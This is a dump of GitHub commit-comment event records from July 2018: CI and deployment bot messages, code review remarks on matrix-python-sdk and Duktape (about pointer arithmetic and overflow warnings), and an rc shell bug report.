{"id":"8040670902","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29895001,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-30T22:34:07Z","updated_at":"2018-07-30T22:34:07Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-30T22:34:07Z"}
{"id":"8040671152","type":"CommitCommentEvent","actor":{"login":"kamronbatman"},"repo":{"name":"jshint/jshint"},"payload":{"comment":{"id":29895002,"position":null,"line":null,"path":null,"commit_id":"d5c1a007f7f4a83fc27f61b27732781d1c589335","created_at":"2018-07-30T22:34:11Z","updated_at":"2018-07-30T22:34:11Z","author_association":"NONE","body":"Thank you!"}},"created_at":"2018-07-30T22:34:11Z"}
{"id":"8040672641","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29895008,"position":null,"line":null,"path":null,"commit_id":"8e06f88f15b7e18bef60cf5d4096a62b95bd4dd1","created_at":"2018-07-30T22:34:36Z","updated_at":"2018-07-30T22:34:36Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [sparklingro](https://sparklingro-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/guides/quickstart/onserver-dev-part1](https://sparklingro-static-docs.pantheonsite.io/docs/guides/quickstart/onserver-dev-part1)\n"}},"created_at":"2018-07-30T22:34:36Z"}
{"id":"8040672915","type":"CommitCommentEvent","actor":{"login":"borkovic"},"repo":{"name":"rakitzis/rc"},"payload":{"comment":{"id":29895009,"position":null,"line":null,"path":null,"commit_id":"9d071b26bf1b1dcd71efb06dc4fb6c25803856a0","created_at":"2018-07-30T22:34:41Z","updated_at":"2018-07-30T22:34:41Z","author_association":"CONTRIBUTOR","body":"I was trying to add a test for this issue to `trip.rc` when I noticed the following anomaly.\r\n\r\n* In one script (t1.rc) the same code runs as \"normal\" script and \r\n* in the other script (t2.rc) the same code runs as a piece of code whose output is to assigned to a variable.\r\n\r\nI expected to see the same output regardless of the context. The script version exhibits the error shown above, but in the assignment context the current code produces the correct result.\r\nI observe the same behavior regardless whether running `rc script` or `rc -p < script`.\r\n\r\nNormal script:\r\n\r\n```\r\nrc/ $ cat t1.rc\r\n\r\nif (true) {\r\n    if (false) {\r\n        echo b1\r\n    }\r\n    if not echo b2\r\n}\r\nif not echo b3\r\n\r\nrc/ $ ./rc.old t1.rc\r\nb2\r\nb3\r\nrc/ $ ./rc.old -p < t1.rc\r\nb2\r\nb3\r\nrc/ $ \r\n```\r\n\r\nVariable assignment:\r\n\r\n```\r\nrc/ $ cat t2.rc\r\nx=`{\r\n    if (true) {\r\n        if (false) {\r\n            echo a1\r\n        } else {\r\n            echo a2\r\n        }\r\n    } else {\r\n        echo a3\r\n    }\r\n}\r\n\r\nwhatis -v x\r\n\r\nrc/ $ ./rc.old t2.rc\r\nx=a2\r\nrc/ $ ./rc.old -p < t2.rc\r\nx=a2\r\nrc/ $ \r\n```\r\n\r\n\r\n"}},"created_at":"2018-07-30T22:34:41Z"}
{"id":"8040673983","type":"CommitCommentEvent","actor":{"login":"non-Jedi"},"repo":{"name":"matrix-org/matrix-python-sdk"},"payload":{"comment":{"id":29895013,"position":5,"line":312,"path":"matrix_client/api.py","commit_id":"8e8359ab9058624a7ad7c5b6e4ef217e1d072f70","created_at":"2018-07-30T22:34:58Z","updated_at":"2018-07-30T22:34:58Z","author_association":"COLLABORATOR","body":"while we're touching this, let's make it consistent. Either of:\r\n\r\n- `get_location_content_pack` and `get_notice_content_pack`\r\n- `get_location_body` and `get_notice_body`\r\n\r\nbut not a mix of both"}},"created_at":"2018-07-30T22:34:58Z"}
{"id":"8040675302","type":"CommitCommentEvent","actor":{"login":"non-Jedi"},"repo":{"name":"matrix-org/matrix-python-sdk"},"payload":{"comment":{"id":29895016,"position":60,"line":648,"path":"matrix_client/api.py","commit_id":"8e8359ab9058624a7ad7c5b6e4ef217e1d072f70","created_at":"2018-07-30T22:35:20Z","updated_at":"2018-07-30T22:35:20Z","author_association":"COLLABORATOR","body":"this can be a `@staticmethod`, too. Right?"}},"created_at":"2018-07-30T22:35:20Z"}
{"id":"8040682059","type":"CommitCommentEvent","actor":{"login":"non-Jedi"},"repo":{"name":"matrix-org/matrix-python-sdk"},"payload":{"comment":{"id":29895033,"position":5,"line":312,"path":"matrix_client/api.py","commit_id":"8e8359ab9058624a7ad7c5b6e4ef217e1d072f70","created_at":"2018-07-30T22:37:16Z","updated_at":"2018-07-30T22:37:16Z","author_association":"COLLABORATOR","body":"Actually, after looking at this further, we shouldn't have those methods on `MatrixHttpApi` in the first place. Probably the right approach is a new module with transparent functions doing nothing but implementing the various semantics of `m.room.message`."}},"created_at":"2018-07-30T22:37:16Z"}
{"id":"8040687496","type":"CommitCommentEvent","actor":{"login":"runewalsh"},"repo":{"name":"PoppyFanboy/Project-Euler-Solutions"},"payload":{"comment":{"id":29895050,"position":null,"line":null,"path":null,"commit_id":"fff80bd593231cd9d5d977d87c05162b5dd60f51","created_at":"2018-07-30T22:38:50Z","updated_at":"2018-07-30T22:38:50Z","author_association":"CONTRIBUTOR","body":"А по условию так, например\r\n```\r\n......\r\n..##..\r\n...##.\r\n```\r\nнельзя?"}},"created_at":"2018-07-30T22:38:50Z"}
{"id":"8040690062","type":"CommitCommentEvent","actor":{"login":"runewalsh"},"repo":{"name":"PoppyFanboy/Project-Euler-Solutions"},"payload":{"comment":{"id":29895060,"position":null,"line":null,"path":null,"commit_id":"fff80bd593231cd9d5d977d87c05162b5dd60f51","created_at":"2018-07-30T22:39:34Z","updated_at":"2018-07-30T22:39:34Z","author_association":"CONTRIBUTOR","body":"А по условию так, например\r\n```\r\n.......\r\n..##...\r\n...##..\r\n.......\r\n```\r\nнельзя?"}},"created_at":"2018-07-30T22:39:34Z"}
{"id":"8040691895","type":"CommitCommentEvent","actor":{"login":"AndyGrant"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29895066,"position":null,"line":null,"path":null,"commit_id":"05d9309a28741bbb8b885b68c5feb08edb7b1425","created_at":"2018-07-30T22:40:06Z","updated_at":"2018-07-30T22:40:06Z","author_association":"NONE","body":"Running this on my 32 hyperthread machine. \r\nI hacked worker.py to let me use 32 instead of 31 cores...\r\nCan stop if you care, otherwise I will let it run for a bit."}},"created_at":"2018-07-30T22:40:06Z"}
{"id":"8040692700","type":"CommitCommentEvent","actor":{"login":"zaaraameera2014"},"repo":{"name":"aosp-mirror/platform_frameworks_base"},"payload":{"comment":{"id":29895069,"position":null,"line":null,"path":null,"commit_id":"605f12d6a54557b31f461e35257962f5b2aa0e81","created_at":"2018-07-30T22:40:18Z","updated_at":"2018-07-30T22:40:18Z","author_association":"NONE","body":"Changed now la"}},"created_at":"2018-07-30T22:40:18Z"}
{"id":"8040695060","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29895075,"position":null,"line":null,"path":null,"commit_id":"3bbb4bccae5d868ddda0cd9c6095c5bda36d1865","created_at":"2018-07-30T22:40:54Z","updated_at":"2018-07-30T22:40:54Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-301](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-301).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-301-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-30T22:40:54Z"}
{"id":"8040696219","type":"CommitCommentEvent","actor":{"login":"zaaraameera2014"},"repo":{"name":"aosp-mirror/platform_frameworks_base"},"payload":{"comment":{"id":29895085,"position":33,"line":1044,"path":"core/java/android/content/res/TypedArray.java","commit_id":"f0896fc51529da847b15067f6595bbf7c2368131","created_at":"2018-07-30T22:41:13Z","updated_at":"2018-07-30T22:41:13Z","author_association":"NONE","body":"CM 14.1.2"}},"created_at":"2018-07-30T22:41:13Z"}
{"id":"8040696559","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29895086,"position":null,"line":null,"path":null,"commit_id":"9b04538a7f603fa4011f680d598065b79a4cc5aa","created_at":"2018-07-30T22:41:19Z","updated_at":"2018-07-30T22:41:19Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2989 of 2992 tests passed, 0 test warnings)\n\nMessages:\n\n * 3 tests had: EIO diffs.\n * 2 tests had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 3 tests had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 641\n * Failed: 3\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9b04538a7f603fa4011f680d598065b79a4cc5aa-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9b04538a7f603fa4011f680d598065b79a4cc5aa-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.9%25-yellow.png)</a> \n"}},"created_at":"2018-07-30T22:41:19Z"}
{"id":"8040701487","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29895105,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-30T22:42:44Z","updated_at":"2018-07-30T22:42:44Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-30T22:42:44Z"}
{"id":"8040709687","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/pynwb-feedstock"},"payload":{"comment":{"id":29895123,"position":null,"line":null,"path":null,"commit_id":"6e1a876a7cb315c1cdccb966dfd6a42a079abe0a","created_at":"2018-07-30T22:45:02Z","updated_at":"2018-07-30T22:45:02Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @ajtritt, @bendichter, @oruebel were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @jcfr was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-30T22:45:02Z"}
{"id":"8040710799","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29895129,"position":null,"line":null,"path":null,"commit_id":"96906b8ba6113468a8701211338a78d77d7b91f1","created_at":"2018-07-30T22:45:21Z","updated_at":"2018-07-30T22:45:21Z","author_association":"COLLABORATOR","body":"<h3>displayName Blueprint3</h3>\n\nPreview: <strong><a href='https://19281-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://19281-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://19281-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-30T22:45:21Z"}
{"id":"8040713429","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29895132,"position":null,"line":null,"path":null,"commit_id":"9b04538a7f603fa4011f680d598065b79a4cc5aa","created_at":"2018-07-30T22:46:05Z","updated_at":"2018-07-30T22:46:05Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9b04538a7f603fa4011f680d598065b79a4cc5aa-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-30T22:46:05Z"}
{"id":"8040714247","type":"CommitCommentEvent","actor":{"login":"xXAndrew28Xx"},"repo":{"name":"xXAndrew28Xx/Conquer"},"payload":{"comment":{"id":29895140,"position":5,"line":23,"path":"build.gradle","commit_id":"a0a25ad1b54441dabd26cec21a04a5ea0e48734d","created_at":"2018-07-30T22:46:18Z","updated_at":"2018-07-30T22:46:18Z","author_association":"OWNER","body":"...................... Cheers ~~🍺 ~~ 💧 "}},"created_at":"2018-07-30T22:46:18Z"}
{"id":"8040715119","type":"CommitCommentEvent","actor":{"login":"fatcerberus"},"repo":{"name":"svaarala/duktape"},"payload":{"comment":{"id":29895142,"position":5,"line":1515,"path":"src-input/duk_bi_string.c","commit_id":"463394aa1c39cf321639a9d6c724f50a53bdcd38","created_at":"2018-07-30T22:46:33Z","updated_at":"2018-07-30T22:46:33Z","author_association":"CONTRIBUTOR","body":"Right, but unsigned integer arithmetic is well-defined as being modulo `2^nbits` so I’m confused why it is that\r\n```c\r\nx += y - z;\r\n```\r\n\r\nIs different than\r\n```c\r\nx = x + y - z;\r\n```\r\n\r\nGiven that unsigned arithmetic is fully associative even in the overflow situation thanks to the modulo behavior.\r\n\r\n(Not questioning the fix btw - more baffled why the *compiler* treats these differently)"}},"created_at":"2018-07-30T22:46:33Z"}
{"id":"8040716550","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29895143,"position":null,"line":null,"path":null,"commit_id":"d37f2a5044959bb4dc3cf17b4c37a0c6e3e4574a","created_at":"2018-07-30T22:46:56Z","updated_at":"2018-07-30T22:46:56Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-1133](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-1133).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1133-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-30T22:46:56Z"}
{"id":"8040717621","type":"CommitCommentEvent","actor":{"login":"non-Jedi"},"repo":{"name":"matrix-org/matrix-python-sdk"},"payload":{"comment":{"id":29895147,"position":60,"line":648,"path":"matrix_client/api.py","commit_id":"8e8359ab9058624a7ad7c5b6e4ef217e1d072f70","created_at":"2018-07-30T22:47:15Z","updated_at":"2018-07-30T22:47:15Z","author_association":"COLLABORATOR","body":"(really weird that this one was previously inline in the method body while `m.emote` and `m.text` had separate methods defined. :/)"}},"created_at":"2018-07-30T22:47:15Z"}
{"id":"8040721342","type":"CommitCommentEvent","actor":{"login":"svaarala"},"repo":{"name":"svaarala/duktape"},"payload":{"comment":{"id":29895159,"position":5,"line":1515,"path":"src-input/duk_bi_string.c","commit_id":"463394aa1c39cf321639a9d6c724f50a53bdcd38","created_at":"2018-07-30T22:48:22Z","updated_at":"2018-07-30T22:48:22Z","author_association":"OWNER","body":"It is at least a potential portability concern if the bit size of the RHS is smaller than the LHS, e.g. if pointers are 64-bit (LHS) and the arithmetic overflowing on the RHS is 32-bit."}},"created_at":"2018-07-30T22:48:22Z"}
{"id":"8040722794","type":"CommitCommentEvent","actor":{"login":"non-Jedi"},"repo":{"name":"matrix-org/matrix-python-sdk"},"payload":{"comment":{"id":29895165,"position":2,"line":103,"path":"matrix_client/room.py","commit_id":"8e8359ab9058624a7ad7c5b6e4ef217e1d072f70","created_at":"2018-07-30T22:48:46Z","updated_at":"2018-07-30T22:48:46Z","author_association":"COLLABORATOR","body":"I'm wondering if each method should have a kwarg flag `encrypted=True` to enable sending unencrypted messages into the room. Probably not though. It's a bad enough idea that we probably want to force people to muck about with `MatrixHttpApi` if they want to do that."}},"created_at":"2018-07-30T22:48:46Z"}
{"id":"8040724787","type":"CommitCommentEvent","actor":{"login":"priyatharsan"},"repo":{"name":"Aifred-Health/Vulcan2"},"payload":{"comment":{"id":29895173,"position":null,"line":null,"path":null,"commit_id":"e281d04e77519923e38af2b17df487aace66b449","created_at":"2018-07-30T22:49:21Z","updated_at":"2018-07-30T22:49:21Z","author_association":"NONE","body":"Awesome job 😎 "}},"created_at":"2018-07-30T22:49:21Z"}
{"id":"8040727289","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":29895181,"position":null,"line":null,"path":null,"commit_id":"429b3c42c9ab9e7c75d81707dbdd5928bfd57c47","created_at":"2018-07-30T22:50:08Z","updated_at":"2018-07-30T22:50:08Z","author_association":"NONE","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2018-07-30T22:50:08Z"}
{"id":"8040727934","type":"CommitCommentEvent","actor":{"login":"non-Jedi"},"repo":{"name":"matrix-org/matrix-python-sdk"},"payload":{"comment":{"id":29895183,"position":null,"line":null,"path":null,"commit_id":"8e8359ab9058624a7ad7c5b6e4ef217e1d072f70","created_at":"2018-07-30T22:50:18Z","updated_at":"2018-07-30T22:50:18Z","author_association":"COLLABORATOR","body":"I think it looks good overall. The point about moving the `get_notice_body` type methods out of `MatrixHttpApi` is really a cleanup thing that's not your fault. I'm good with merging this as-is and then cleaning that stuff up later. I would like the method name of `get_location_content_pack` changed, though."}},"created_at":"2018-07-30T22:50:18Z"}
{"id":"8040729412","type":"CommitCommentEvent","actor":{"login":"nwashangai"},"repo":{"name":"nwashangai/my_diary"},"payload":{"comment":{"id":29895188,"position":null,"line":null,"path":null,"commit_id":"dc7601baff779391de0bec7eb1245c0e72191f4e","created_at":"2018-07-30T22:50:41Z","updated_at":"2018-07-30T22:50:41Z","author_association":"OWNER","body":"* Database setup\r\n* Persistent connection using json web token (jwt)\r\n* Signup and Login endpoints\r\n* Get all entry endpoint\r\n* Get a specific enntry endpoint\r\n* Add entry endpoint\r\n* Modify entry endpoint"}},"created_at":"2018-07-30T22:50:41Z"}
{"id":"8040730191","type":"CommitCommentEvent","actor":{"login":"svaarala"},"repo":{"name":"svaarala/duktape"},"payload":{"comment":{"id":29895191,"position":5,"line":1515,"path":"src-input/duk_bi_string.c","commit_id":"463394aa1c39cf321639a9d6c724f50a53bdcd38","created_at":"2018-07-30T22:50:55Z","updated_at":"2018-07-30T22:50:55Z","author_association":"OWNER","body":"So to be clear, with `x = x + y - z` the first value is `x`, the next computed value is `x + y` which is again a pointer (of the LHS bit size), and `x + y - z` is again a pointer. So even if RHS has a smaller bit size, all the arithmetic happens in the LHS bit size."}},"created_at":"2018-07-30T22:50:55Z"}
{"id":"8040733476","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29895204,"position":null,"line":null,"path":null,"commit_id":"2c43d0b852bf1e81e092fb674ad6a6188ee0afb4","created_at":"2018-07-30T22:51:50Z","updated_at":"2018-07-30T22:51:50Z","author_association":"NONE","body":"158922394_Issue#4431 (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2956 of 2956 tests passed, 1 test warnings)\n\nMessages:\n\n * 1 test had: ERR diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2c43d0b852bf1e81e092fb674ad6a6188ee0afb4-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2c43d0b852bf1e81e092fb674ad6a6188ee0afb4-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-30T22:51:50Z"}
{"id":"8040747940","type":"CommitCommentEvent","actor":{"login":"tallclair"},"repo":{"name":"kubernetes/community"},"payload":{"comment":{"id":29895231,"position":13,"line":13,"path":"committee-steering/governance/sig-charter-template.md","commit_id":"32d184cee2ecb7c72f9de75e687f4a88f7c36413","created_at":"2018-07-30T22:55:57Z","updated_at":"2018-07-30T22:55:57Z","author_association":"MEMBER","body":"The anchor is just based on the line number :/"}},"created_at":"2018-07-30T22:55:57Z"}
{"id":"8040748940","type":"CommitCommentEvent","actor":{"login":"jfgrissom"},"repo":{"name":"SneakyFish5/moneyd-uplink-xrp"},"payload":{"comment":{"id":29895233,"position":24,"line":267,"path":"index.js","commit_id":"6648ca1667cce7ec89d25ad8385ed7434f606ba1","created_at":"2018-07-30T22:56:14Z","updated_at":"2018-07-30T22:56:14Z","author_association":"NONE","body":"I wouldn't remove this. Removing this makes an assumption that the user consuming this has actually set the value you're going to count on.\r\n\r\nYou should check to see if this.pluginsOpts.outgoingChannelAmount is actually set then use the Plugin.OUTGOING_CHANNEL_DEFAULT_AMOUNT if your override value isn't set."}},"created_at":"2018-07-30T22:56:14Z"}
{"id":"8040754944","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29895250,"position":null,"line":null,"path":null,"commit_id":"32656ff067f5518a013ecf52ad00651c3962a269","created_at":"2018-07-30T22:57:56Z","updated_at":"2018-07-30T22:57:56Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-301](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-301).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-301-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-30T22:57:56Z"}
{"id":"8040755286","type":"CommitCommentEvent","actor":{"login":"svaarala"},"repo":{"name":"svaarala/duktape"},"payload":{"comment":{"id":29895251,"position":5,"line":1515,"path":"src-input/duk_bi_string.c","commit_id":"463394aa1c39cf321639a9d6c724f50a53bdcd38","created_at":"2018-07-30T22:58:02Z","updated_at":"2018-07-30T22:58:02Z","author_association":"OWNER","body":"A very concrete example of the problem when RHS has `unsigned char` type:\r\n- `x` is a valid pointer with the value 0x10000\r\n- `y` is 0x10\r\n- `z` is 0x11\r\n\r\nThe arithmetic before the diff would be:\r\n```\r\nx = x + (y - z) => x = 0x10000 + (0x10U - 0x11U) => x = 0x10000 + 0xffU = 0x100ff\r\n```\r\n\r\nwhereas the arithmetic after the diff would be:\r\n```\r\nx = x + y - z => x = 0x10000 + 0x10U - 0x11U => x = 0x10010 - 0x11U = 0xffff\r\n```\r\n\r\nThe latter pointer (0xffff) is the desired result.\r\n\r\nThis issue only happens when the RHS bit size is smaller than the LHS bit size. And AFAICT with `-fsanitize=undefined` a warning is issued even when some behavior is not concretely a problem in the current configuration, but *might* be a problem in some configuration."}},"created_at":"2018-07-30T22:58:02Z"}
{"id":"8040757961","type":"CommitCommentEvent","actor":{"login":"samanthagatt"},"repo":{"name":"samanthagatt/Q-and-A"},"payload":{"comment":{"id":29895258,"position":null,"line":null,"path":null,"commit_id":"ed082ff7fadba39838bf9065f5d35f6bad779836","created_at":"2018-07-30T22:58:50Z","updated_at":"2018-07-30T22:58:50Z","author_association":"OWNER","body":"Something seems to be wrong with either my question controller's update func or my viewWillAppear. The question cell doesn't update after pushing submit answer, and when you click on the cell again the answer and answerer text doesn't show the answer or answerer."}},"created_at":"2018-07-30T22:58:50Z"}
{"id":"8040766077","type":"CommitCommentEvent","actor":{"login":"fatcerberus"},"repo":{"name":"svaarala/duktape"},"payload":{"comment":{"id":29895275,"position":5,"line":1515,"path":"src-input/duk_bi_string.c","commit_id":"463394aa1c39cf321639a9d6c724f50a53bdcd38","created_at":"2018-07-30T23:01:09Z","updated_at":"2018-07-30T23:01:09Z","author_association":"CONTRIBUTOR","body":"That makes sense, thanks.  I don’t like when compiler behavior seems too much like black magic so it’s good to have a proper explanation once in a while. :)"}},"created_at":"2018-07-30T23:01:09Z"}
{"id":"8040766986","type":"CommitCommentEvent","actor":{"login":"jfgrissom"},"repo":{"name":"SneakyFish5/moneyd-uplink-xrp"},"payload":{"comment":{"id":29895277,"position":25,"line":273,"path":"index.js","commit_id":"6648ca1667cce7ec89d25ad8385ed7434f606ba1","created_at":"2018-07-30T23:01:25Z","updated_at":"2018-07-30T23:01:25Z","author_association":"NONE","body":"Not sure this can rightly be called pluginOpts.\r\n\r\nYou're not modifying the options passed to the plugin.\r\n\r\nIt seems to me that it would just be `this.outgoingChannelAmount`."}},"created_at":"2018-07-30T23:01:25Z"}
{"id":"8040767706","type":"CommitCommentEvent","actor":{"login":"kueken"},"repo":{"name":"OpenPLi/enigma2"},"payload":{"comment":{"id":29895287,"position":null,"line":null,"path":null,"commit_id":"99da61cabd22f0e3c1a7e59412f8845ffc0d400c","created_at":"2018-07-30T23:01:37Z","updated_at":"2018-07-30T23:01:37Z","author_association":"NONE","body":"`coercing to Unicode: need string or buffer`\r\n\r\ndoes not anyone else have the problem?"}},"created_at":"2018-07-30T23:01:37Z"}
{"id":"8040770537","type":"CommitCommentEvent","actor":{"login":"rekols"},"repo":{"name":"xtuJSer/CoCoMusic"},"payload":{"comment":{"id":29895298,"position":null,"line":null,"path":null,"commit_id":"26684e7dd0c0ba19ac026a9103121161ef2e7b82","created_at":"2018-07-30T23:02:28Z","updated_at":"2018-07-30T23:02:28Z","author_association":"NONE","body":"天机，哈哈哈 )"}},"created_at":"2018-07-30T23:02:28Z"}
{"id":"8040771682","type":"CommitCommentEvent","actor":{"login":"svaarala"},"repo":{"name":"svaarala/duktape"},"payload":{"comment":{"id":29895305,"position":5,"line":1515,"path":"src-input/duk_bi_string.c","commit_id":"463394aa1c39cf321639a9d6c724f50a53bdcd38","created_at":"2018-07-30T23:02:50Z","updated_at":"2018-07-30T23:02:50Z","author_association":"OWNER","body":"I'm not sure my explanation is correct, but it's at least my understanding why the warning happens :) The problem is actually pretty similar to some of the 32->64 bit porting problems several code bases had at some point."}},"created_at":"2018-07-30T23:02:50Z"}
{"id":"8040778263","type":"CommitCommentEvent","actor":{"login":"svaarala"},"repo":{"name":"svaarala/duktape"},"payload":{"comment":{"id":29895319,"position":5,"line":1515,"path":"src-input/duk_bi_string.c","commit_id":"463394aa1c39cf321639a9d6c724f50a53bdcd38","created_at":"2018-07-30T23:04:54Z","updated_at":"2018-07-30T23:04:54Z","author_association":"OWNER","body":"FWIW all those 32->64 bit porting cases should be fixed by now in the Duktape code base, but there might be some issues left if sizeof(size_t) < sizeof(void *) which is possible but not common. The `-fsanitize=undefined` should pinpoint at least some of those potential problems."}},"created_at":"2018-07-30T23:04:54Z"}
{"id":"8040781852","type":"CommitCommentEvent","actor":{"login":"Kylibyaka"},"repo":{"name":"Kylibyaka/TaskManager"},"payload":{"comment":{"id":29895323,"position":4,"line":4,"path":"Main/src/TaskManager/Task.java","commit_id":"27f7ef4051718b5b80d26a30c064c3150be02402","created_at":"2018-07-30T23:06:03Z","updated_at":"2018-07-30T23:06:03Z","author_association":"OWNER","body":"про именование чего именно?"}},"created_at":"2018-07-30T23:06:03Z"}
{"id":"8040782976","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29895327,"position":null,"line":null,"path":null,"commit_id":"e9221fc2f3ec8bdfb9c4157d536cca091b9f9d32","created_at":"2018-07-30T23:06:24Z","updated_at":"2018-07-30T23:06:24Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-299](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-299).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-299-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-30T23:06:24Z"}
{"id":"8040790300","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29895352,"position":null,"line":null,"path":null,"commit_id":"b7a698654b26efa15ef82b3ea4c2c846fd99bc1b","created_at":"2018-07-30T23:08:35Z","updated_at":"2018-07-30T23:08:35Z","author_association":"MEMBER","body":"@flyinghead Rebased sgc_if.cpp so it is as close to your branch as possible -\r\n\r\nhttps://github.com/libretro/reicast-emulator/commit/789c0f37778d61ceb0364421bb2e025102fc0f53\r\n\r\nThe only thing I still have to comment out is the UpdateAeg() function call for FNS/FNS,OCT."}},"created_at":"2018-07-30T23:08:35Z"}
